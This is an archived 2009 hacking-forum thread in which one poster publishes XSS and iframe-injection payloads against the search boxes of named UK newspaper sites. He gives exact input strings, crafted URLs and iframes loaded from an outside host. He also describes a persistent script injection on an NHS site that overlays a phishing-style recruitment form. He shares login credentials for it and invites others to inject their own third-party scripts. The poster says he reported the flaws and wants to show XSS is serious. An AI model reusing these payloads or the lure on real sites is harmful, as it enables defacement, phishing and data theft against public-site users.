| Author | Message |
|---|
[-TE-]-Methodman
2009-08-13
19:50:42
|
|
Philip_Clarke
2009-08-14
17:20:43
|
| Quote | Like I said I'd like to become a member. Your "friends" over at the times quoting neo have been informed of this iframe injection.
| Code: |
<iframe src=http://nemesis.te-home.net/Forum/. />
|
|
in the search box for the TLS archive leads to this
(sometimes you need to put a - in front of the search term to make sure the search generates results.) And when you do this in the times search box
| Code: |
'';!--"<script>alert('0 -xss')</script>=&{()}
|
|
You get an XSS. (about 5 or 6 as the vulnerability is based on the advertising links constructed from the search).
Journalists, News desk informed, (as part of an ongoing story) no response.
I'll post this under Visa until I can have admin rights to start a new thread
Philip
nod@3xlock.com
|
|
[-TE-]-Neo
2009-08-14
23:33:36
|
| Quote | | Good job, Philip. :P
____________________
']['€AM€LiT€
|
|
Philip_Clarke
2009-08-14
23:45:23
|
| Quote | | [-TE-]-Neo wrote: | | Good job, Philip. :P']['€AM€LiT€ |
|
Thank you, I have more but not having privileges to start a new thread is an inconvenience. |
|
Philip_Clarke
2009-08-15
03:51:02
|
| Quote | Guardian Newspaper (and yahoo) XSS script injection
using
in the search box at http://www.guardian.co.uk/ gives nothing, but if you click on the "search user contributions" radio button it goes off to yahoo (apparent url is http://uk.search.yahoo.com/search in the html source) with the same query which completes some javascript code when the page loads eh voila
Eventual URL: http://www.guardian.co.uk/search/users?search=%27%3Balert(%27XSS%27)%3Ba%3D%27&searchType=user
Then using a similar technique, I close the script off nicely, open an iframe and then open the script to get an iframe. This one needs you to create your own form though since it exceeds the size value of the input box.
| Code: | | ';</script><iframe src=http://nemesis.te-home.net/ /><script>a=' |
|
I'd like to have Neo mail me, I need to discuss his TimesOnline contact about something I've been working on.
Thank you.
|
|
Philip_Clarke
2009-08-15
03:55:10
|
| Quote | | Philip_Clarke wrote: | Guardian Newspaper (and yahoo) XSS script injection
using
in the search box at http://www.guardian.co.uk/ gives nothing, but if you click on the "search user contributions" radio button it goes off to yahoo (apparent url is http://uk.search.yahoo.com/search in the html source) with the same query which completes some javascript code when the page loads eh voila
Eventual URL: http://www.guardian.co.uk/search/users?search=%27%3Balert(%27XSS%27)%3Ba%3D%27&searchType=user
Then using a similar technique, I close the script off nicely, open an iframe and then open the script to get an iframe. This one needs you to create your own form though since it exceeds the size value of the input box.
| Code: | | ';</script><iframe src=http://nemesis.te-home.net/ /><script>a=' |
|
I'd like to have Neo mail me, I need to discuss his TimesOnline contact about something I've been working on.
Thank you.
|
|
This BB code really doesn't like me, it didn't like the https:// for the images. |
|
Philip_Clarke
2009-08-15
04:09:37
|
| Quote | News of the Newspaper XSS script and iframe injection
Last one before I go to bed.
http://www.newsoftheworld.co.uk/
| Code: |
<script>alaert('xss')</script>
|
|
makes a mess of the page (tried tidying it up but there's a character limit to the textbox and it;s late in the UK).
Then a very routine iframe injection
| Code: |
<iframe src=http://nemesis.te-home.net />
|
|
Absolutely sod all protection on that search box apart from the character limit and that was more likely by accident than design.
|
|
[-TE-]-Neo
2009-08-15
09:38:28
|
| Quote | | Philip_Clarke wrote: |
Thank you, I have more but not having privileges to start a new thread is an inconvenience. |
|
That's weird, you should have the right to post new topics - scroll down to see "Post New Topic".
____________________
']['€AM€LiT€
|
|
Philip_Clarke
2009-08-15
17:53:37
|
| Quote | | [-TE-]-Neo wrote: | | Philip_Clarke wrote: |
Thank you, I have more but not having privileges to start a new thread is an inconvenience. |
|
That's weird, you should have the right to post new topics - scroll down to see "Post New Topic".']['€AM€LiT€ |
|
Nope (firefox user) No new topics in the XSS section at all, anyway this is what I wanted to post as a new topic so I'd appreciate it if you'd split it out. It was also what I wanted to discuss with you (Neo)
This an in depth XSS exploit and rewrite of www.nhs.uk
I have tried contacting the news agencies etc... MP's, website
administrator... This is now over 96 hours old and I thought it would
have been picked up.
The story is that I am a 37 year old Director of a small company that
makes PHP software, one of which stops exploits (old timer, I don't
even have a nick and there would vaporize the myth about kiddies). When
I read about the MOD and MI5 hacks, and then the home office stating
that the attack on MI5 was trivial, I thought of all the things that
could be done. Posioned search results, mis-information (as everything
is redirected through the search page), installing key loggers on people's
machine that were searching for specific information. So I went to see
what I could find to prove these points and to prove that a XSS exploit is not
"trivial". I found an exploit in the logged on section of http://www.nhs.co.uk
so I figured that what was needed was a demonstration to lure people into the
site.
A mailing list inviting people to take part in a health questionnaire would be
nice and personal.
I would suggest sending a job advertisement sent out to top executives looking
for an IT-Director so I registered the domain nhs-recruitment.co.uk and used
that to create a
username:
applicant@nhs-recruitment.co.uk
with a password
IT-director
You can log in and see how the page changes from a normal page to a two/
three line form asking for details to be submitted. I have disabled the
links using javascript. (please no-one alter this as I want the
government to see it, if you want to, create your own account).
If you click on the Editiorial Policy link below, there is a big page of
text explaining my reasons for doing this and listing the MP, Civil
Servant (in charge of the UK's twitter policy actually) and Baroness
(former head of MI5) that I have tried to contact about this and the
seriousness.
Oh and I put a penguin on the swine flu page, mouse over health a-z and
then click on swine flu follow me.
So that's
http://www.nhs.co.uk
click the login text top right
username: applicant@nhs-recruitment.co.uk
password: IT-director
btw you will notice a long explanation about why the server is not
rooted, this is for the benefit of the civil servants who may think that
the "computer" has been taken over and don't understand the concepts of XSS
I invite anyone to create their own user friendly pages, create an account, pull some script in from a third party, they use jquery so there's plenty of scope for manipulation. Maybe set up some amusing guidelines for us to have a look at ?
Below are some screenshots. Best experienced using firefox although IE8 was very fast at rendering the scripts.
Thank you
Philip.
The altered logged in page (click on Start your new career to get the application form displaying using a nice jquery slidedown)
links are disabled so I could direct anyone to any page, real or false
click on editorial policy to get the explanation to the civil service and government why xss is serious and why the server is not rooted
mouse over the Health A-Z to get the to swine flu information.
 |
|
